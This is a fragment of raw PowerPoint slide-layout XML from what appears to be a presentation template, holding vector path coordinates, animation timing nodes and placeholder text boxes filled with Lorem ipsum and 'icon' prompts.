                  <a:pt x="1539125" y="0"/>
                  <a:pt x="1641473" y="102348"/>
                  <a:pt x="1641473" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1641473" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1641473" y="2099891"/>
                  <a:pt x="1539125" y="2202239"/>
                  <a:pt x="1412873" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1286621" y="2202239"/>
                  <a:pt x="1184273" y="2099891"/>
                  <a:pt x="1184273" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1184273" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1184273" y="102348"/>
                  <a:pt x="1286621" y="0"/>
                  <a:pt x="1412873" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="820206" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="946458" y="0"/>
                  <a:pt x="1048806" y="102348"/>
                  <a:pt x="1048806" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048806" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048806" y="2099891"/>
                  <a:pt x="946458" y="2202239"/>
                  <a:pt x="820206" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="693954" y="2202239"/>
                  <a:pt x="591606" y="2099891"/>
                  <a:pt x="591606" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="591606" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="591606" y="102348"/>
                  <a:pt x="693954" y="0"/>
                  <a:pt x="820206" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="228600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="354852" y="0"/>
                  <a:pt x="457200" y="102348"/>
                  <a:pt x="457200" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="2099891"/>
                  <a:pt x="354852" y="2202239"/>
                  <a:pt x="228600" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102348" y="2202239"/>
                  <a:pt x="0" y="2099891"/>
                  <a:pt x="0" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="102348"/>
                  <a:pt x="102348" y="0"/>
                  <a:pt x="228600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44" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="59"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8504770" y="1482278"/>
            <a:ext cx="2990141" cy="2642687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2242606" h="2202239">
                <a:moveTo>
                  <a:pt x="2014006" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2140258" y="0"/>
                  <a:pt x="2242606" y="102348"/>
                  <a:pt x="2242606" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2242606" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2242606" y="2099891"/>
                  <a:pt x="2140258" y="2202239"/>
                  <a:pt x="2014006" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1887754" y="2202239"/>
                  <a:pt x="1785406" y="2099891"/>
                  <a:pt x="1785406" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1785406" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1785406" y="102348"/>
                  <a:pt x="1887754" y="0"/>
                  <a:pt x="2014006" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1412873" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1539125" y="0"/>
                  <a:pt x="1641473" y="102348"/>
                  <a:pt x="1641473" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1641473" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1641473" y="2099891"/>
                  <a:pt x="1539125" y="2202239"/>
                  <a:pt x="1412873" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1286621" y="2202239"/>
                  <a:pt x="1184273" y="2099891"/>
                  <a:pt x="1184273" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1184273" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1184273" y="102348"/>
                  <a:pt x="1286621" y="0"/>
                  <a:pt x="1412873" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="820206" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="946458" y="0"/>
                  <a:pt x="1048806" y="102348"/>
                  <a:pt x="1048806" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1048806" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1048806" y="2099891"/>
                  <a:pt x="946458" y="2202239"/>
                  <a:pt x="820206" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="693954" y="2202239"/>
                  <a:pt x="591606" y="2099891"/>
                  <a:pt x="591606" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="591606" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="591606" y="102348"/>
                  <a:pt x="693954" y="0"/>
                  <a:pt x="820206" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="228600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="354852" y="0"/>
                  <a:pt x="457200" y="102348"/>
                  <a:pt x="457200" y="228600"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="457200" y="1973639"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="2099891"/>
                  <a:pt x="354852" y="2202239"/>
                  <a:pt x="228600" y="2202239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="102348" y="2202239"/>
                  <a:pt x="0" y="2099891"/>
                  <a:pt x="0" y="1973639"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="102348"/>
                  <a:pt x="102348" y="0"/>
                  <a:pt x="228600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9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4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3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3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3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4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4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4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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="48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9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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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4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4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4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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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300" fill="hold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300" fill="hold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300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4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4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4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4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="77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9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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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4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4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4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6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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300" fill="hold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300" fill="hold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300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4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4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4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uiExpand="1"/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" grpId="0" animBg="1"/>
      <p:bldP spid="13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2" grpId="0" animBg="1"/>
      <p:bldP spid="73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7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7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7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4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4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7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7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6" grpId="0" animBg="1"/>
      <p:bldP spid="77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7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7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7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8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7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7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uiExpand="1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2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29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30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3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3" grpId="0" uiExpand="1"/>
      <p:bldP spid="44" grpId="0" uiExpand="1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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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ic lis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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-474133" y="1715377"/>
            <a:ext cx="1947333" cy="782954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39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="1761099"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26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1805521" y="1715377"/>
            <a:ext cx="2777772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6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27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1805519" y="2025112"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706103" y="1715377"/>
            <a:ext cx="1937455" cy="782954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40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10787243" y="1761099"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584746" y="1715377"/>
            <a:ext cx="2777772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6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31" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252638" y="2025112"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rounded Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-474133" y="3193657"/>
            <a:ext cx="1947333" cy="782954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43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="3239379"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805521" y="3193657"/>
            <a:ext cx="2777772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6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35" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="45" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805519" y="3503390"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rounded Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10706103" y="3193657"/>
            <a:ext cx="1937455" cy="782954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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="46" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10787243" y="3239379"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="47" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7584746" y="3193657"/>
            <a:ext cx="2777772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6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39" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="48" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252638" y="3503390"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rounded Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-474133" y="4671937"/>
            <a:ext cx="1947333" cy="782954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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="4717659"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="50" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805521" y="4671937"/>
            <a:ext cx="2777772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6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43" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="51" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1805519" y="4981672"/>
            <a:ext cx="4121148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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecenas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
